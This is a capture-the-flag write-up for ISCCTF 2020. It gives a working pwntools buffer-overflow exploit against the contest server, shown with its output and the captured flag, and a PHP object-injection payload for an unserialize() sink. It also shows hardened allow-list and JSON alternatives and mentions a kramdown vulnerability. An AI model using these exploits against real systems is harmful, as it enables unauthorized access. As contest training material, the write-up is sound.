ISCCTF 2020: Write up
Pwn
stuck
```python
from pwn import *

e = ELF('./chall')
#p = process('./chall')
p = remote('34.84.136.181', 4000)

ret_addr = 0x0040101a          # plain `ret` gadget, re-aligns the stack before calling win()
flag_addr = e.symbols['win']   # address of win(), which prints the flag

payload = b'A' * 112           # fill the buffer up to the saved return address
payload += p64(ret_addr)
payload += p64(flag_addr)

p.sendline(payload)
p.interactive()
```

```
└─$ python main.py
[*] '/home/kali/ISSCTF2020/stuck/chall'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
[+] Opening connection to 34.84.136.181 on port 4000: Done
[*] Switching to interactive mode
What's your name? > Hello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a@, I'm full stuck engineer!!!!!.
ISCCTF{Y0u_kn0w_5t4ck_0v3rfl0w}
```
Reversing
strings
Just run the `strings` command on the binary.
Web
Greetings
Just look at the source of `/js/greet.js`.
Yonezer
Looking at the source:

```php
<html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="style.css">
</head>
<body>
<?php
function html($string) {
    return htmlspecialchars($string);
}

$flag = file_get_contents("../flag.txt");

class secret{
    public function data(){
        global $flag;
        echo($flag);
    }
}

class share_video{
    public $text="Hello Everone";
    public function data(){
        echo("<h1>" . html($this->text) . "</h1><br>");
        echo("<MARQUEE><h1>Do you like this video 👀?</h1></MARQUEE>\n");
        $urls = ["https://www.youtube.com/embed/s582L3gujnw","https://www.youtube.com/embed/gJX2iy6nhHc", "https://www.youtube.com/embed/SX_ViT4Ra7k","https://www.youtube.com/embed/Zw_FKq10S8M"];
        $num = rand(0,3);
        $url = $urls[$num];
        echo ("<div id=\"all\"><iframe width=\"1000\" height=\"600\" src=\"". $url . "\"></iframe></div>");
    }
}

$serialized = @$_GET["data"];
$hoge = @unserialize($serialized);
if($hoge){
    $hoge->data();
}
?>
</body>
</html>
```
We can see the vulnerability: the `data` parameter is passed straight into `unserialize()`, so we can choose which class gets instantiated and have `data()` called on it. Serializing an empty `secret` object gives the payload:

```php
<?php
class secret{}
$a = new secret();
echo serialize($a);
?>
```

```
$ php main.php
O:6:"secret":0:{}
```
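For comparison, here is how the same sink would look if it were hardened. This is an added example, not code from the challenge: it assumes only the `share_video` class from the challenge source (its `data()` body is reduced to the heading), and the function names `load_untrusted_vulnerable`, `load_untrusted_hardened` and `load_from_json` are hypothetical.

```php
<?php
// Added example, not the challenge's own code.
// Assumes the share_video class from the challenge (data() shortened here).
class share_video {
    public $text = "Hello Everyone";
    public function data() {
        echo("<h1>" . htmlspecialchars($this->text) . "</h1><br>\n");
    }
}

// Vulnerable form (what the challenge does): any class defined anywhere in the
// application can be instantiated by the caller, e.g. O:6:"secret":0:{}.
function load_untrusted_vulnerable(string $serialized) {
    return @unserialize($serialized);
}

// Hardened form: allow-list the one class this endpoint expects. Any other class
// name in the payload is turned into __PHP_Incomplete_Class, which the instanceof
// check rejects, so no other class's methods can ever be reached from here.
function load_untrusted_hardened(string $serialized): ?share_video {
    $obj = @unserialize($serialized, ['allowed_classes' => ['share_video']]);
    if (!($obj instanceof share_video)) {
        return null;
    }
    return $obj;
}

// Better still: do not accept PHP serialized objects from the client at all.
// Accept a plain data format, validate the fields, and build the object yourself.
function load_from_json(string $json): ?share_video {
    $d = json_decode($json, true);
    if (!is_array($d) || !isset($d['text']) || !is_string($d['text'])) {
        return null;
    }
    $v = new share_video();
    $v->text = $d['text'];
    return $v;
}

// Constructed inputs: the challenge payload and a legitimate share_video.
$attack = 'O:6:"secret":0:{}';
$legit  = 'O:11:"share_video":1:{s:4:"text";s:2:"hi";}';

// The hardened loader refuses the secret object and accepts the expected class.
var_dump(load_untrusted_hardened($attack) === null);
var_dump(load_untrusted_hardened($legit) instanceof share_video);

// The JSON loader needs no unserialize() at all.
$v = load_from_json('{"text":"hi"}');
if ($v !== null) {
    $v->data();
}
?>
```

The `allowed_classes` option exists since PHP 7.0; on older PHP there is no safe way to call `unserialize()` on user input, which is another reason to prefer the JSON route.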
mark damn it
The source code is provided, and the Gemfile contains `gem "kramdown", "2.2.1"`.

Searching around, this version appears to have a vulnerability that allows reading arbitrary files or executing arbitrary code.